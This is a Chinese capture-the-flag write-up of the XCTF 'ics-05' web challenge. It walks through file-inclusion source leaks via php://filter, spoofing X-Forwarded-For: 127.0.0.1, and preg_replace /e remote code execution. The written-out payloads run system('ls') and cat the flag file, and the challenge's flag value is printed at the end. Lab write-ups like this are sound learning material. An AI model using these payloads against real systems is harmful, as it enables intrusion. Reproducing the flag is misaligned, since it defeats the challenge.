攻防世界-web ics-05

题目描述：其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

逐个点击菜单栏，发现只有设备维护中心有跳转

题目提示了利用后门入侵，应该和网站后台页面有关系

首先使用dirsearch扫描网站目录,发现有个/index.php/login目录

dirsearch 是一款网络路径扫描器，自带的字典比较齐全，个人认为比较好用

下载地址：https://github.com/maurosoria/dirsearch

尝试访问，发现页面有超链接，尝试点击

发现page有默认的参数，并且修改这个参数后也会有输出

 猜测是文件包含漏洞，尝试使用php伪协议读取文件：

PHP伪协议读取文件源码用法

1 2	php://filter/read=convert.base64-encode/resource=[文件名] http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

PHP伪协议执行php代码用法

1 2 3 4

php://input + [POST DATA] http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?>

  php伪协议用法参考:https://www.cnblogs.com/endust/p/11804767.html

构造payload读取index.php

/index.php/login?page=php://filter/read=convert.base64-encode/resource=index.php

 

对读取的内容进行BASE64解密 

 BASE64解密在线工具：http://www.jsons.cn/base64/

第一部分关键代码分析：（拿不到flag可以直接跳到第二部分的代码分析看）

<?php

$page = $_GET[page];

if (isset($page)) {

if (ctype_alnum($page)) {  //ctype_alnum() 函数检测字符串是否全部为字母和(或)数字字符。
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php
                //strpos()函数查找字符串在另一字符串中第一次出现的位置（区分大小写),返回字符串在另一字符串中第一次出现的位置，如果没有找到字符串则返回 FALSE
                if (strpos($page, 'input') > 0) { 
                    die();
                }
                if (strpos($page, 'ta:text') > 0) {
                    die();
                }
                if (strpos($page, 'text') > 0) {
                    die();
                }
                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page); //如果前面的验证都通过了，就会包含$page
                    die();
                ?>

关键函数：

ctype_alnum() 函数检测字符串是否全部为字母和(或)数字字符；

strpos()函数查找字符串在另一字符串中第一次出现的位置（区分大小写),返回字符串在另一字符串中第一次出现的位置，如果没有找到字符串则返回 FALSE；

首先会对传入的参数使用type_alnum() 函数检测，因为我们使用的是php伪协议包含了' :// '，不全是字母和(或)数字字符，接下来就会进入else{}部分，一共有4次的strpos()函数判断，只要参数中存在：input、ta:text、text、index.php就会执行die()结束程序（之所以把input也过滤了，是因为我们要使用伪协议的php:input来执行代码查看flag路径）

而想要到达include包含，就要想办法绕过strpos(),而strpos（）是区分大小写的，我们只要使用php://INPUT即可绕过

构造payload

但是却没有我们想要的结果输出，好吧，应该是php://input的利用条件没有满足

是真的坑，被这部分代码干扰消耗了许多时间 

再来审计第二部分关键代码：

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];
    //?pat=/123/e&rep=phpinfo()&sub=123
    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);//preg_replace 函数执行一个正则表达式的搜索和替换。
        //搜索 subject 中匹配 pattern 的部分， 以 replacement 进行替换。
    }else{
        die();
    }

}

 preg_replace是已知存在/e代码执行漏洞的

/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码

漏洞参考链接：https://blog.csdn.net/senlin1202/article/details/50800009?spm=1001.2101.3001.6650.6&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-6.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7ERate-6.pc_relevant_default&utm_relevant_index=7

利用此漏洞的同时需要抓包构造X-Forwarded-For: 127.0.0.1才能进入if语句内部

构造payload查看当前目录（记得抓包添加X-Forwarded-For: 127.0.0.1）

http://111.200.241.244:65502/index.php?pat=/ok/e&rep=system('ls')&sub=okk

 

 修改payload查看s3chahahaDir目录，发现flag

 /index.php?pat=/ok/e&rep=system(%27ls%20s3chahahaDir/%27)&sub=okk

 修改payload查看flag文件夹下内容

/index.php?pat=/ok/e&rep=system(%27ls%20s3chahahaDir/flag/%27)&sub=okk

 读取flag.php文件

/index.php?pat=/ok/e&rep=system(%27cat%20s3chahahaDir/flag/flag.php%27)&sub=okk

cyberpeace{05d630f89591041c654a2b6245f2080a}